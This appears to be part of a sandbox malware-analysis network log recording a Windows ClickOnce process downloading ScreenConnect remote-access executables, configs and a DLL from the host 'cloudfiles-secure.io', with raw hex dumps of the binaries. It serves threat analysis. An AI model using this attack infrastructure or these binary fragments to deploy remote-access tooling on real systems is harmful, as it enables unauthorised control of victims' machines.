00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF\|t^8uYt8uP0(YYt8uPYYv\|YYtE8u@-P
2024-10-02 04:16:27 UTC	16384	IN	Data Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39 Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@\|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
2024-10-02 04:16:27 UTC	16384	IN	Data Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00 Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
2024-10-02 04:16:27 UTC	13816	IN	Data Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b Data Ascii: 3033333444(414B4T4o44444/595?5E555557%88P9h9999999999O::;p;{;;;,<<<W======>>>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49749	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:28 UTC	136	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:16:28 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 61216 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:28 GMT Connection: close
2024-10-02 04:16:28 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
2024-10-02 04:16:28 UTC	16384	IN	Data Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-10-02 04:16:28 UTC	16384	IN	Data Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
2024-10-02 04:16:28 UTC	12280	IN	Data Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49750	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:29 UTC	140	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip Connection: Keep-Alive
2024-10-02 04:16:29 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:29 GMT Connection: close
2024-10-02 04:16:29 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49751	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:30 UTC	111	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:30 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:29 GMT Connection: close
2024-10-02 04:16:30 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:31 UTC	119	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:31 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:31 GMT Connection: close
2024-10-02 04:16:31 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:32 UTC	109	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:32 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81696 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:31 GMT Connection: close
2024-10-02 04:16:32 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
2024-10-02 04:16:32 UTC	16384	IN	Data Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
2024-10-02 04:16:32 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
2024-10-02 04:16:32 UTC	16384	IN	Data Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
2024-10-02 04:16:32 UTC	16376	IN	Data Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49754	178.215.236.119	443	6176	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:16:33 UTC	97	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: cloudfiles-secure.io Accept-Encoding: gzip
2024-10-02 04:16:33 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:16:33 GMT Connection: close
2024-10-02 04:16:33 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a Data Ascii: &rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*0@su
2024-10-02 04:16:33 UTC	16384	IN	Data Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
